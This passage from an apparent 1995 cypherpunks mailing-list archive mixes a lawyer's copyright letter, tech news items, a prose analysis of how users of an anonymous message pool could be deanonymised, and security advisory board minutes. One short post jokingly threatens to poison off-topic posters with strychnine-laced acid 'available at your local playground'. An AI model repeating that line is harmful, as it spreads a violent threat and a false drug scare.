     two   newsgroups   involved,   alt.religion.scientology   and
     alt.technology.clearing, limiting the potential for reposting
     and downloading.  It will then be easier  to  deal  with  the
     intentional infringers through appropriate channels.
          Both  the  uploading  and downloading of these materials
     constitute  unauthorized  copying  and  distribution  of  the
     materials  in  violation  of our clients' rights under United
     States copyright laws and the law of other  countries,  where
     applicable.    Damages  and  an  injunction  against  further
     unauthorized copying and distribution may be obtained against
     infringers and, all unauthorized copies and all materials and
     equipment by which the unauthorized copies may be  reproduced
     can   be   impounded.    Unauthorized   disclosure   of   the
     confidential  Advanced  Technology  materials  also  violates
     applicable trade secrets laws.
          Action  is  being  taken directly with the systems users
     who we know are primarily responsible for these violations of
     my clients' rights.  We hope those actions will put an end to
     the infringements by  these  users.   We  do  {not}  wish  to
     involve  others in  litigation.  Unfortunately, however, such
     actions will  be  unavoidable  where  there  is  contributory
     infringement  by  those who knowingly induce or contribute to
     the infringing conduct of these users by providing facilities
     or systems that enable the  direct  infringers  to  infringe,
     because  we  legally  must  take  all  actions to protect our
     clients'  property   rights.    Courts   are   holding   such
     contributory  infringers  liable.   Two  examples  are:  Sega
     Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
     Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
     1152 (M.D.  Fla.  1993).
          Recent   proposed   legislation   regarding    potential
     liability   of  systems  operators  and  others  who  provide
     facilities or services, such  as  annonymous  remailers,  for
     information  passing through their systems has understandably
     created concern  on  the  part  of  systems  operators  as  a
     potential  liability.   We  ask  your voluntary assistance in
     dealing with these known wilful infringers  so  that  we  can
     both  deal  with the problem without legal hassles, and legal
     liability can be confined to those who intend to  create  the
     situation.
          We  ask that you confirm that you have blocked access to
     these newsgroups through your remailer.  If you are unwilling
     to  do  so,  we  ask that you inform us as to the reasons for
     your position.
                                             Sincerely,
                                             Thomas M. Small

@_date: 1995-01-04 18:35:29
@_author: Name withheld on request 
@_subject: British Hacker Story 
From: newsbytes at clarinet.com (NB-LON)
   Subject: London Newspaper Runs Old "Superhacker" Story
   01/03/95
   Date: 3 Jan 95 20:44:22 GMT
   LONDON, ENGLAND, 1995 JAN 3 (NB) -- As the UK started back
   to work today after the long Christmas and New Year
   shutdown, readers of the Independent newspaper were treated
   to the banner headline "British Boy Raided US Defense
   Secrets."
   The curious thing about the story was that none of the
   other nationalpapers or news wires carried any reports. On
   investigation, Newsbytes discovered why -- the story dates
   back to July of last year, and briefly resurfaced in early
   November on the US news wires.
   According to the Independent, a 16-year-old British boy has
   been arrested in connection with a alleged unauthorized
   intrusions into the US government's computers and "was able
   to watch secret communications between US agents in North
   Korea during the crisis over nuclear inspections last
   spring."
   The story is quite correct, except that the boy in question
   was arrested last July, when the original story broke.
   Commenting on the story, Peter Sommer, a leading security
   consultant and a senior with the Computer Research Center
   at the London School of Economics, said that it smacked of
   the British Telecom secrets case of late November,also
   reported in the Independent.
   That story, as reported by Newsbytes, turned out to be
   something of a non-event when the hacker, who posted
   details of top secret files on BT's ex-directory computer
   "across the Internet," turned out to be Steve Fleming, a
   Scottish freelance journalist who worked as a temp for BT
   in the summer and broke BT's own security rules by
   downloading files from the BT's Customer Service System
   (CSS) computer, then mailed them -- across the Internet --
   to other people.
   "I'm amazed at the Independent running yet another story
   involving the Internet," Sommer told Newsbytes, adding that
   it is "a very old story. It seems that all they have to do
   is to work up a story about a hacking attempt, whether
   successful or not, and weave in a story about the Internet,
   and it's a headline story."
   Ken Young, newly installed editor of Communicate, a leading
   industry communications magazine in London, and a veteran
   of the UK communications industry for more than a decade,
   told Newsbytes that the story seemed a little thin.
   "It looks like another hacking story except that (the
   newspaper) has written in something about the Internet, and
   bingo! You've got a report that the information was
   accessible to 32 million users on the Internet," he said.
   Sommer, meanwhile, told Newsbytes that he had made his own
   discreet inquiries about the story with high level
   authorities when it broke last summer.
   "There are two problems with this case. Firstly, any lawyer
   worth his salt would invoke Section 69 of the Police &
   Criminal Evidence Act," he said. This Act, Sommer
   explained, requires that, before a computer can be
   considered as admissible evidence in court, the owner of
   the computer must issue a certificate of correct working.
   This, he said, could not be issued, as a casual user of a
   PC would be unable to make such a certification.
   Sommer went on to explain that the second reason that the
   case could be problematic for the prosecution was "that the
   lawyer would ask the court for full disclosure of all
   affected files on victim's host computers," which, since
   such files are almost certain to be classified in the US,
   could not be revealed in a British courtroom.
   The facts surrounding the case, as reported by Newsbytes,
   were that the 16-year-old -- operating under the code name
   of Data Stream -- was one of several who gained
   unauthorized access to the US defense computer network in
   late 1993 and early 1994 and that some files were deleted.
   At the time, press reports said that as many as a million
   passwords were compromised, and may have compromised the
   military readiness of the United States. The case has,
   Newsbytes understands, been fully investigated by the US
   Air Force Office of Special Investigations (OSI) although
   details of the report of the investigation by the USAF OSI
   are classified.
   Originally, the press reports of the time speculated
   whether the youth would be the first under-18 to be
   extradited to the US to face charges. It seems that,
   following last summer's arrest and submission of the report
   to the Crown Prosecution Service that the case is being
   quietly shuffled into a file because of the practical
   problems in pursuing a prosecution.

@_date: 1995-01-06 17:26:41
@_author: Name withheld on request 
@_subject: No Subject 
(giggle) (giggle) (giggle) (giggle) Me, too. Love always,
Carole Anne Buttock
P.S. Someone with a clue: please help me get a life. Only 10
     cross posts!!!

@_date: 1995-01-25 16:42:01
@_author: Name withheld on request 
@_subject: Modem Tax!--Write to FCC Commmissioner Craig Shergold 
If any more of this non-cypherpunks related stuff turns up on the list those responsible will be fed "Blue Star", "Sad Clown", and "Bart Simpson" blotter acid (free samples available at your local playground) till they die of strychnine poisoning!

@_date: 1995-01-27 00:51:39
@_author: Name withheld on request 
@_subject: Reordering, not Latency (Was: Re: Remailer) 
If you read my analysis with more care, you will note that I do not argue
latency is superior to reordering, nor that it should be used in place of
reordering.  Reordering is far superior to latency. My point is that pure
reordering is vulnerable to attack. It is less vulnerable if combined with
Also note that this was a repost of a message I sent to the list some
ago. I sent it because it seemed similar to the work that Wei Dai has been
        -Louis Cypher

@_date: 1995-07-28 06:36:32
@_author: Anonymous 
@_subject: Java, Netscape, OpenDoc, and Babel (NewsClip) 
Responding to msg by merriman at arn.net (David K. Merriman) on Fri, 28 Jul  3:24 AM
The mall will be accessible July 31 from a pointer at  .
OSF Opens Software Web Mall For Java
Cambridge, MA, July 26 (NB) -- In a
teleconference today, the Open Software Foundation (OSF) plans to open an Open Software Mall on the Web on July 31, and start distributing software there this fall that will include Ports technology for the Web, DCE (Distributed Computing
Environment) Web, and Microkernel Unification Specification, a
new technology for building cross-platform applications.
At the teleconference, which was attended by Newsbytes, Dr. Ira
Goldstein, chief scientist and executive VP, said that the OSF the Open Software Mall as a place for users to access and help beta test new technologies like Java Ports, DCE Web, and
Microkernel Unification -- being sponsored by the OSF in
conjunction with major vendors -- as well as software from
universities and other research collaborators, and eventually,
outside "open systems" efforts that are "germane to core OSF
Java Ports, a series of ports of Sun's Java technology for the is being produced by the OSF with Sun, Hewlett-Packard, and Goldstein told the journalists and analysts. The technology will be
available on the Open Software Mall in September, he added.
DCE Web, an application designed to provide the Web with DCE
mechanism for encryption, access control, and naming, is a
collaborative project from the OSF, Hitachi, HP and AT&T.
DCE Web is "consistent with HTTP and secure HTTP," but able to
provide additional services to DCE sites, according to Microkernel Unification -- from the OSF, Hitachi, HP and IBM -- a technology for building cross-platform databases and other
applications by writing directly to a standard, common application programming interface (API).
IBM plans to produce a product that is "mostly compliant" with new specification in the product's first release, and compliant" in its second release, Goldstein noted.
Digital Equipment Corp. might also be participating in the
Microkernel Unification specification project, Goldstein adding that he expects to have an answer on this from Digital
within a week.
download, and comment on software executables and software,
documentation plans, design documentation, specifications, and
commentary in hypertext format, according to Goldstein.
The Web mall will also provide Web links to "relevant products,
services, education and consulting available from the he told the teleconference participants.
Java, DCE Web, and Microkernel Unification will each have their Web stores on the Open Software Mall's ATO (Advanced Technology
Offering) Plaza.
ATOs are software technology projects, which may or may not to productization, where participants seek to minimize risk by
obtaining feedback from users, noted the OSF's Peter Shaw. ATO
development costs typically range from $300,000 to $600,000.
For ATO technologies that become productized, licensing rights estimated at $25,000 per licensee.
The OSF also sponsors other vendor efforts, known as PSTs, in
which vendors are closer to "productization" of their work, and
development costs tend to be higher, said Shaw.
Current PSTs include DCE 1.2 and Motif/CDE (Common Development
Environment). In addition, four potential PSTs are "being pursued," Shaw maintained. "We expect to have some on these later this week," he added.
The PSTs will also be given their own area on the Open Software
Mall, to be known as PST Plaza.
Aside from the stores for Java, DCE Web, and Microkernel
Unification, the ATO Plaza will also include "Web pages for a
potpourri of (other) ATOs," according to Goldstein.
Additional areas of the Open Software Mall will include Plaza," the Motif/CD Store, and areas for tools, training, and
The mall will officially open next Monday, Goldstein said. offerings will include an explanation of its goals and and the opportunity for user commentary. The mall will be
accessible from a pointer at  .
(Jacqueline Emigh/19950726/Reader Contact: Open Software
Foundation, 617-621-8700; Press Contact: Jane Smeloff,
OSF, 617-621-8997)

@_date: 1995-11-02 12:22:34
@_author: Anonymous 
@_subject: IBM's Microkernal 
Responding to msg by perry at piermont.com ("Perry E. Metzger") on Wed, 01 Nov 11:51 AM
It's related to IBM's work on machine/code interface security, encryption and authentication capabilities. Cryptographers may want to examine how these work in Microkernal. If IBM will allow access to the features.
And it's related to parallel alarms sounded on cypherpunks about the impossibility of any durable security which does not anticipate ever-changing attacks devised by authors of competing products and services.
Finally, not your hat size, to be sure, it's related to the vanity of computer security consultants who dismiss unknown competition at the peril of their credibility.
"The free market is a terror for tortured souls." Anonymous.

@_date: 1995-11-03 01:29:39
@_author: Name Withheld by Request 
@_subject: alt.anonymous.messages considered harmful 
alt.anonymous.messages considered harmful.
The advantage of using an anonymous message pool over using a chained
reply block is, of course, the huge number of potential recipients.
However, there are a number of problems, including a serious attack.
Some of them could be avoided with a slightly different approach.
1. When reading news on a server not under her direct control, Alice
lets leak information (article selection, time used per article),
so that she loses the additional security of using a message pool.
She can avoid this by processing alt.anonymous.messages off line.
2. By sending messages of a certain size and number to a pseudonymous
address, an attacker can find out that the pseudonymous user
participates in the pool: The encrypted messages are public;
encryption does not affect size and number of messages.
This information is also available at the alias server. That is not a
problem as such. Anonymity is protected by the size of the pool.
In combination with 1., this attack can lead to disclosure of a
3. Denial of service attack. If the attacker can delay or suppress
delivery of messages to a subset of the recipients, the pseudonym's
reaction to the message or lack thereof reveals which subset the user
belongs to. He can track down the pseudonym to Alice with O(log(n))
This is a practical attack, not restricted to a single point of failure
such as the local news server: Persons at well-connected Usenet sites
can send cancel (or superseding) messages with restricted distribution
by use of the Distribution: and Path: lines.
Those who do get the message, can not notice a cancel attack; those
who don't, would have to carefully search for suspicious Supersedes:
lines and monitor the control newsgroup. A denial of service attack by
manipulated Path: header cannot be detected by the victim.
Denial of service attacks could be made somewhat less feasible by
making the pool accessible as a mailing list and via http.
Some problems not related to security (such as restricted availability
and bogus cross-posted traffic in the newsgroup) could also be solved
by reproducing the encrypted posts to alt.anonymous.messages in a
mailing list.
Identification of encrypted messages as needed for 2. and helpful for
3. can be prevented by using a fixed-size message format and inserting
cover messages.
If these messages are numbered and signed by the alias server, users
can detect denial of service attacks (but not distinguish them from
network errors) and try to get the messages through another channel.
For perfect security, however, feedback from all participants would be
required during transmission of the message. This is hardly possible.
So, for highest security return addresses, an "everyone a remailer"
mix net might be the better solution.

@_date: 1995-11-04 04:04:01
@_author: Anonymous 
@_subject: IBM's Microkernal 
The Wall Street Journal, October 31, 1995, p. B6. IBM Announces New Software Code That Is Universal
By Laurie Hays
International Business Machines Corp., in its effort to reduce
the importance of computer-operating systems, announced a new
kind of universal-software code called Microkernal that
enables software to work on incompatible hardware.
For software developers and businesses that want to develop
one set of codes to run applications on many different
machines, Microkernal offers an opportunity for the
long-touted open computing. A big challenge remains, however:
to market the technology and make a business case for software
developers to write for Microkernal in a world that is
dominated by Intel Corp. and Microsoft Corp.
"It's exciting technology, but it will be hard for them to
market," says Dan Kuznetsky, an analyst with International
Data Corp., a Framingham, Mass., market-research firm. "It's
also got a long way to go from what they've announced to the
Mr. Kuznetsky likens the technology to the development of a
great automobile transmission that has yet to be turned into
a truck or a car.
The key to Microkernal is a single source code base that
communicates between the hardware and the operating system.
One long-term possibility, for example, would be to make the
Apple Computer Inc.'s Maclntosh operating system work on an
Intel PC, impossible today because the two have different
design architectures that don't talk to each other.
IBM's delayed OS/2 operating system for the PowerPC chip,
which is expected to be shipped by the end of the year, will
be the first IBM offering for the Microkernal allowing
developers to move applications to the chip with only small
IBM so far has garnered a number of licensing agreements for
Microkernal, including Digital Equipment Corp., Maynard,
Mass., and LG Electronics, formerly the Korean electronics
concern Goldstar, as well as a number of universities.

@_date: 1995-11-04 10:03:16
@_author: Anonymous 
@_subject: Webernet Madne$$ 
Wall Street Journal, November 3, 1995
Wall Street is in the throes of Internet mania. Or is it
Internet madness?
Investors have poured into Internet-related stocks in the
past couple of days, pushing some Web darlings such as
Spyglass and Netscape Communications to dizzying new
"People are blindly investing in anything that says
Internet," said Willian Bluestein, an analyst at
Forrester Research in Cabridge, Mass.
"Everyone wants to buy into the craze," says John
Sebrich, who works with mutual-fund investor Mario
Gabelli. ...
What is the big stampede all about? During the past week
or so, some of the highest-profile, highest-flying
Internet stocks have actually reported profits, a
development the Street wasn't expecting until next year
at best. ...
"The reason Intuit's moving up is the realization that if
you had to do the banking industry over again, you
wouldn't use brick and mortar," said Neal P. Miller,
manager of Fidelity Investments' New Millennium Fund.
"I think the size of this Internet thing is just dawning
on everyone," he said.
Neil Weintraut said, "Money managers are realizing that
there is tremendous strength behind this. It's not just
a technology chasing a marketplace." ... [and more gush]
Web and Wild [Chart]
                                             Percent
                              Yesterday's    Change
Company                       Close          This Week
Spyglass                      $70.50         +70%
Uunet Technologies             67.00         +41%
Netcom Online                  68.63         +30%
Performance Systems            21.25         +30%
Intuit                         82.75         +21%
Netscape                       98.25         +21%
European Firms Join Research Group In Bid to Guide
Internet Development
By Douglas Lavin
Paris - - Afraid of being frozen out of the booming
interest in the Internet, 20 European companies joined
together to form the European arm of an Internet research
The World Wide Web Consortium's European branch will work
with the U.S. Web consortium on such global issues as
electronic commerce, but it will also work on such
international issues as the use of languages other than
English on the Web, the multimedia portion of the
"We must assure that the beautiful springtime of the
World Wide Web is not also the autumn of the French
language," said Elisabeth Dufourcq, France's secretary of
state for research at a conference here to announce the
creation of the European branch.
Several large European technology firms, including Oy
Nokia of Finland and Siemens AG of Germany, who are
hoping to play a major role in the development of the
Internet here ponied up $150,000 to join the consortium.
Particularly well-represented are telephone companies who
see the Internet as a threat to their ability to control
national voice and data networks. Among the European
members of the consortium, announced at a conference on
the Web here, are British Telecommunications PLC and the
national telecommunications companies of France, Germany,
Italy and Belgium. All five companies either offer or are
planning to offer Internet access.
One of the group's key tasks is to ensure that
improvements made by such rival companies as Netscape
Communications Corp. and Microsoft Corp., both members of
the U.S. consortium, don't create separate parts of the
Internet that can only be read by Microsoft or Netscape
Membership in the European consortium, which is to be
based at the French national computer-research institute,
Inria, also shows a remarkable degree of interest in the
Web by the French business and government establishment,
which only a year ago dismissed the Internet as a
American version of France's Minitel network, but now is
avidly promoting the Internet's growth.
Among the members of the consortium from France are
Assurances Generale de France, the insurance company;
Electricite de France, the electricty company; Cie. des
Machines Bull, the computer maker; Aerospatiale, the
aerospace concern; and Thomson-CSF, the arms
manufacturer, all of them state-controlled, as well as
such private concerns as Alcatel-Alsthom SA and Groupe
Inria, which already has taken over some Web research
work from CERN, the nuclear-research organization in
Switzerland where the Web was created in 1989 by Tim
Mr. Berners-Lee, now at the Massachusetts Institute of
Technology, is heading both the U.S. and the European
research consortia.
Nuclear research > munitions research > controlled crypto > controlled commerce > economic espionage > ten thousand-year reign of the PGP-DigiBank-MIT-CERN crypto-commo-libertarian Phill, what's the admission code to W3 world domination?

@_date: 1995-11-05 14:27:17
@_author: Anonymous 
@_subject: lp (134.222.35.2)? 
I'm sure some of you will have seen this, so sorry to toss logs on the
listburn fire; still, it seemed worth reposting to CP--no, it's not
entirely crypto-related, but nor is it a completely vague allegation.
byte packets

@_date: 1995-11-06 08:58:06
@_author: Anonymous 
@_subject: whose watchin Cypherpunks: nym question 
Stephen Whitaker-nym's resubmission ("whose watchin the watchers"
4:19 PM 11/5/95) of the very same material that I had  posted last night
suggest some questions about some aspects of nym theory. I hope the
following isn't too naive, and I apologize if it is.
      When I saw issue 183 of GovAccess, Jim Warren-nym's remarks seemed
suspect, but I didn't have a thorough enough understanding of the issues
to judge them myself -- so I decided to vet the question with the
Cypherpunks. I'm glad I did: the quick and knowledgeable responses
clarified the error, and I forwarded them to Warren-nym so that he could
correct himself promptly. The end result, as Warren rightly suggests I
think, is that a better understanding of the issues has been propagated to
his subscriber base.
      AFAIK, Warren-nym has an excellent reputation -- and that fact
certainly encouraged me to provide him with the info he would need to
correct himself quickly. OTOH, my actions garner no reputation for me --
neither for my True Name nor for nobody at REPLAY.COM. Of course, whether
such actions merit any reputational shift is debatable: I contributed no
knowledge of my own, just merely acted as a go-between. Still, the fact
that GovAccess 184 quotes my response might suggest that I beat others to
the punch; and were I able to act in such a capacity on a regular and
consistent basis, and were I to do so in a field with higher stakes, I
would surely garner a reputation. Granted, this is a lot of "woulda,
coulda" -- but it leads me to conclude that it is not the shortcomings of
my *action* that are the cause of the fact that I garner no reputational
improvement in this instance.
      Stephen Whitaker-nym's resubmission of this material, OTOH, lowers
his reputation in my eyes -- which is strange, because the only real
distinction between what he did and what I did has to do with the fact
that he sent mail to Cypherpunks without reading the Cypherpunks traffic.
So his reputational shift is purely contextual.
      So why don't I, then? Well, for starters, the nym that the Replay
remailer assigned to me is publicly accessible: anyone who uses this
remailer in the way that I did will be assigned the same quasi-nym,
nobody at REPLAY.COM. yet if, through some statistical improbability, I were
the *only* person *ever* to use this remailer in this way, and I *only*
ever used it to perform actions that would improve the reputation of a
stable nym, then the public knowledge of Replay's functionality would
neverthless serve to hinder any reputational shift that my actions had
earned: people might say, "Every message I know of that has passed through
Replay has been accurate, timely, and significant" -- but that would
improve the reputation of the Replay remailer rather than of its sole
user, myself, even though it was my actions -- *including* the use of the
Replay remailer -- that brought about this reputational shift.
      So what is a nym if not a "True Name"? I distinguish "True Name" (in
quotes) from True Name: a True Name is tied to a matrix of information
extrinsic to the entity it refers to (a SS# has no *intrinsic* relation to
the entity it designates), whereas a "True Name", though free of this info
matrix, neverthless operates according to the same logic that a True Name
does -- in terms of being tied to actions that garner reputational shifts.
The point being -- I'm probably being pretty unclear -- that if the major
distinction between a "True Name" and a True Name are links (or the lack
thereof) to arbitary and external information (and maybe the disposability
that the lack of links implies), then a lot of nym theory seems like it
pretty much reproduces True Name logic and operations.       Anyway, a lot of you understand this all better than I do, so I hope
to learn from any responses I receive.

@_date: 1995-11-09 05:42:30
@_author: Anonymous 
@_subject: CSSPAB June 1995 
URL: [Reformatted for easier reading]
                       MINUTES OF THE
                JUNE 7-8, 1995 MEETING OF THE
     COMPUTER SYSTEM SECURITY AND PRIVACY ADVISORY BOARD
Wednesday, June 7, 1995
A quorum being present, the Chairman, Dr. Willis Ware, called
the meeting to order at 9:00 a.m. at the National Institute of
Standards and Technology (NIST), Gaithersburg, Maryland.
Besides Dr. Ware, the following Board members were present: Charlie Baggett Jr., Genevieve Burns, Cris Castro, Don
Gangemi, Sandra Lambert, Joseph Leo, Henry Philcox, Randy
Sanovic, Linda Vetter, Steve Walker, and Bill Whitehurst.
Mr. Ed Roback, Board Executive Secretary and newly appointed
Designated Federal Official, discussed some of the handouts
provided to the Board.  Most important, was a copy of a draft
House bill referred to as the "Department of Commerce
Dismantling Act."  If enacted, part of NIST would be
transferred to the National Science Foundation.  The Commerce
Program Resolution Agency (CPRA) would be established and
attempt to sell NIST laboratories (and other specified
elements of the Department of Commerce) to the private sector. If not sold within 18 months of enactment, CPRA would submit
their recommendations to Congress on the appropriate
disposition of the property and functions of the laboratories.
OMB Circular A-130, Appendix III Update and Review of Comments
and "NII Security: The Federal Role" Mr. Ed Springer of the Office of Information and Regulatory
Affairs, Office of Management and Budget (OMB), updated the
Board on the recently signed Paperwork Reduction Act of 1995.
(Copies are available for distribution to the Board.)  (ACTION
- SECRETARY).  Mr. Springer said that security remains a
concern and is supported by strong language in the law
requiring agencies to secure their systems. Mr. Springer
updated the Board on Appendix III to OMB Circular A-130. Since his briefing to the Board in March, the comment period
for the proposed changes to Appendix III has closed.  OMB
received twenty-nine written comments to date. He solicited
Board members for their reactions to the draft proposal.  Mr.
Springer was asked how OMB will enforce the requirements of
Appendix III.  He said enforcement comes through oversight and
the budget process. There is a sharper focus on where agencies
can go for help. One Board member asked if OMB plans to
develop a standard set of behaviors.  Mr. Springer replied
that OMB will not go that far; however, Appendix III addresses
the risks for agencies to use as a guideline for security
considerations.  Board members noted that agency visits to
senior management regarding security plans, as was conducted
in the 1989-1990 timeframe, seemed successful.  Mr. Springer
said that the Federal Managers Financial Integrity Act
provides oversight of the requirement for agencies to prepare
new plans.  Mr. Springer agreed to brief the Board at its
September meeting to further discuss the comments received and
current status.  He mentioned that the final document "NII
Security: The Role of Federal Government," would be out soon
and Board members would receive copies.  (ACTION - SECRETARY).
Defensive Information Warfare & Unclassified Government and
Private Sector
Mr. Martin Hill, Deputy Director for Information Warfare
Programs, Office of the Assistant Secretary of Defense,
briefed the Board on Information Warfare (IW) from a DoD
perspective. He said that commanders should not depend on
information and information systems that they cannot rely on. He used the example of Desert Storm, which was a won through
the use of intelligence; Iraq, in effect, lost the war before
it even began.  Mr. Hill said that IW is driven by daily
attacks on U.S. computer networks.  The national security
construct is changing because DoD utilizes commercial sector
security and shares their vulnerabilities.  The DoD
unclassified definition of IW is "Actions taken to achieve
information superiority in support of national military
strategy by affecting adversary information and information
systems while leveraging and protecting our information and
information systems."  Some of the areas that need defending
are: leadership; command facilities; integrated air defense
and controls; computers, software, data bases, and displays;
power production sources; and links to media. The U.S. IW
strategy is to:
-  Use U.S. technological superiority to provide the right
   information to the right place at the right time,
-  Aggressively defend against attacks on our information, and
-  Use offensive techniques to attain and maintain information
   superiority.
Mr. Hill also emphasized the need for and importance of
training.  He said they have assembled "Red Teams" made up of
DoD personnel that converge on other DoD systems to determine
their vulnerabilities.  When asked how DoD could best
communicate their requirements to the commercial sector, Mr.
Hill said that they conduct seminars and "war games" which are
both attended by industry.  (See Reference X/Open Security Branding Proposal
Mr. Peter Callaway, Senior Security Technologist for IBM,
provided the Board with an update on the X/Open security
branding proposal.  Mr. Callaway was speaking from three
perspectives: IBM (a member of X/Open), X/Open, and as a user. He said that X/Open feels they have the appropriate and proven
experience by setting industry standards and performing
conformance branding.  X/Open has the commitment of vendors to
build products to their specifications with regard to
technical plans established with vendor cooperation and
commitment to product follow-through.  X/Open Branding is a
certification scheme for conformance verification, not
evaluation. Currently, X/Open branding requires evidence of
successful execution of a test suite where appropriate test
suites are available.  It requires a conformance statement
questionnaire and a trademark license agreement to be
completed by the applicant.  (See Reference # 2.)
Security Policy Board (SPB) Update
Ms. Vicki LaBarre, Security Policy Board (SPB) Staff, briefed
the Board on the progress of the SPB.  Ms. LaBarre reminded
the Board of the role of the SPB as chartered by Presidential
Decision Directive (PDD)-29.  The SPB and Security Policy
Forum are jointly chaired by DoD and intelligence community
members, but their members include non-DoD and
non-intelligence community representatives. Ms. LaBarre
relayed that the SPB considers itself an "honest broker" to
identify issues and positions from all parties on key
questions.  She said that the fundamental question is whether
the executive branch needs a single, consolidated INFOSEC
policy making mechanism.
If a consolidated INFOSEC policy making mechanism is needed: Can the existing SPB structure created by PDD-29 meet that
-  If yes: how should an information systems security
   committee be chartered and constituted?
-  If not: how could/should the SPB/SPF be modified to become
   an effective INFOSEC policy mechanism?  What other existing
   entity in the executive branch could act, or be modified to
   act as the executive branch's INFOSEC policy making
   apparatus?  What kind of new entity could be created to
   meet this policy making need?
If a consolidated INFOSEC policy making mechanism is not
-  How can the existing INFOSEC policy and advisory boards,
   committees, forums, etc., be made to more effectively
   identify, prioritize, resource and act on major INFOSEC
   issues and vulnerabilities affecting the national interest?
-  Are executive branch INFOSEC resources adequate to provide
   for acceptable security for government information systems?
-  Are existing INFOSEC resources appropriately located and
   distributed within the executive branch?
Recently the SPB staff convened a special working group to
draft a resolution to call for compiling a list of major
INFOSEC issues.  The matter will be discussed at the Security
Policy Board Forum meeting on June 23.  In summary, Ms.
LaBarre emphasized that we must to do a better job of INFOSEC
governmentwide which is doable if everyone works together for
the common good.
Throughout Ms. LaBarre's presentation, some Board members
expressed serious concerns about many aspects of the SPB's
charter, the first SPB staff report and their present stance
on the effort of a single policy making mechanism.  Some Board
members expressed the view that the initial report was not
clear with regard to what kind of information would encompass
"national interest." She said that the first report was purely
a "think piece" to stimulate discussion, which it has done.
(See Reference Commercial Key Escrow Update
Mr. Steve Walker, President, Trusted Information Systems
(TIS), presented the Board with an update of TIS' Commercial
Key Escrow (CKE) activities.  Mr. Walker recently met with
senior management of National Semiconductor Corporation.  They
discussed a proposal to use CKE in an escrowing approach
called Commercial Automated Key Escrow (CAKE) in which the CKE
system has been modified to work with National's PersonaCard
cryptographic hardware tokens. Mr. Walker believes that this
approach meets the needs expressed by the Vice President. CAKE does the following:
1. It removes all very strong cryptography from software.
2. It uses these special CAKE tokens to automatically escrow
   an encrypted copy of every message key within the message
   envelope itself, in a special Data Recovery Field (DRF)
   consisting of the message key and Data Recovery Center
   (DRC) and token identifiers, encrypted with the public key
   of a Designated DRC.
3. It provides access to DRFs via the private key of the DRCs,
   and allow any user to establish their own DRC to safeguard
   corporate information.
4. It uses well known cryptographic algorithms such as DES,
   triple DES and RSA, instead of algorithms such as Skipjack.
5. Finally, it gives American computer and communications
   industries the ability to easily export strong and very
   strong encryption as part of their information highway
   products.
Mr. Walker briefly discussed the software binding issue which
have been put off by implementation into the PCMCIA card but,
it still needs to be tried and a software vendor is being
sought to do so.  The card implementation is aimed at files
and e-mail, not telephony.  There is initial concern with
regard to cost, however, it is tamper proof and cannot be
distributed over the Internet.  Mr. Walker said they are
seeking export approval with DES and CKE and hopes for a
position resolution in the near future. (See Reference The meeting recessed at 5:20 pm.
Thursday, June 8, 1995
SI-PMO Action Plan Briefing
Mr. Al Williams, Acting Director of the Security
Infrastructure Program Management Office (SI-PMO) at GSA,
updated the Board on the activities and progress of the
SI-PMO.  He discussed some of the near term goals: identifying
and resolving critical policy issues related to support
multiple technologies, developing a security architecture,
defining user-to-user and user-to SI specifications, and
establishing a formal liaison between the SI-PMO and the
Canadian Government.  Board members asked about milestones. Mr. Williams directed members to the summary of the near-term
actions and milestones in the Action Plan appendix.  When
asked who has received the Action Plan, Mr. Williams replied
that it was distributed to the Government Information
Technology Services Group, the National Information
Infrastructure Security Issues Forum, the Electronic Commerce
Acquisition Program Management Office, the E-Mail Program
Management Office, NSA, NIST, and the PKI Steering Committee.
The Board commended Mr. Williams for working an issue with a
real time frame.  Mr. Williams was invited to come back and
update the Board as he feels appropriate.  (See Reference Common Criteria Update
Dr. Stu Katzke, Chief, NIST Computer Security Division,
updated the Board on the Common Criteria (CC) effort.  He
discussed the Common Criteria for Information Technology
Security Evaluation workshop on May 11-12 in Ottawa, Canada. Approximately 40 people from Europe, Canada, the U.S., and
Japan participated in the workshop.  The workshop served to
allow the CC Editorial Board to:
-  provide general information on the comments received and
   the planned changes to the document based on these
   comments; and
-  receive added clarifications on the reviewers' comments on
   the document so they can update the document to reflect the
   expert opinions.
The number of assurance levels and where they are were
discussed; however, that issue is not as high on the list as
the six key global issues below:
1. Document Organization - understandability and usefulness;
2. Extensibility of Requirements - support of ITSEC is
   unclear;
3. Extensibility of CC - how to maintain the CC;
4. Protection Profile - relationship unclear;
5. Protection Profile - selection of requirements; and
6. Dependencies and Binding - completeness/correctness.
Dr. Katzke said that the NCSC plans to perform evaluation
trials by January of 1996.  (See Reference   Mr. Charlie
Baggett volunteered to brief the Board in September  on trial
evaluations.  (ACTION - SECRETARY AND MR. BAGGETT.)
The discussion then turned to the Board's March resolution
(95-2) which recommended to NIST and NSA that a statement be
made regarding the equivalence of C2-level evaluated products. Mr. Lou Giles of NSA briefed the Board on NIST and NSA's
response to that recommendation.  In July, NIST and NSA will
publicly clarify the relationship between TCSEC C2, ITS EC E2,
and CTCPEC T1 levels to encourage federal programs with
requirements for evaluated low assurance level products to use
trusted products evaluated at these levels.  NIST and NSA will publish a Bulletin in July 1995, which will describe a
structure for the selection and acceptability of these
products.  The Bulletin will include an appendix listing the
products evaluated  and in evaluation under each criteria. (See Reference Mr. Giles used the phrase "selection preferences for C2
requirements."  Some Board members said that the word
preference takes away from equivalency and they are concerned
that the list of requirements is a preference list rather than
a menu.  Selection preferences for C2 requirement are
as follows:
-  C2 products on U.S. EPL;
-  Products under U.S. TCSEC Evaluation (C2);
-  FPC2/T1 products on Canadian EPL or
   FC2/E2 products on European EPL; and
-  Products under CTCPEC (FPC2/T1) or ITSEC (FC2/E2)
   Evaluation.
Some Board members are concerned that the list suggests that
U.S. products be used first, thereby implying that they are
better than other products.  In discussion, most Board members
recommended they order the products in rank of completed vs
Mr. Giles updated TTAP accomplishments.  To date the work
group has performed the following:
-  Drafted an SOW for TTAP Developmental Commercial Evaluation
   (Feb. 95);
-  Annotated outline for document on what it takes to be
   accredited under NVLAP (Mar. 95);
-  Drafted first suggested evaluator actions for TCSEC Class
   C2 provided to NVLAP for review (Apr. 95);
-  Drafted second suggested evaluator actions for TCSEC Class
   C2 (May 95); and
-  Drafted first Technical Review Board expectations of a team
   (May 95).
Future activities for TTAP include:
-  Contract for TTAP Developmental Commercial Evaluation
   (Jun/Jul 95);
-  Start TTAP Developmental Commercial Evaluation (Aug. 95);
-  Conduct lessons learned from contracted effort (May 96);
   and
-  Expect NVLAP to accredit several Labs (NLT Aug. 96).  (See
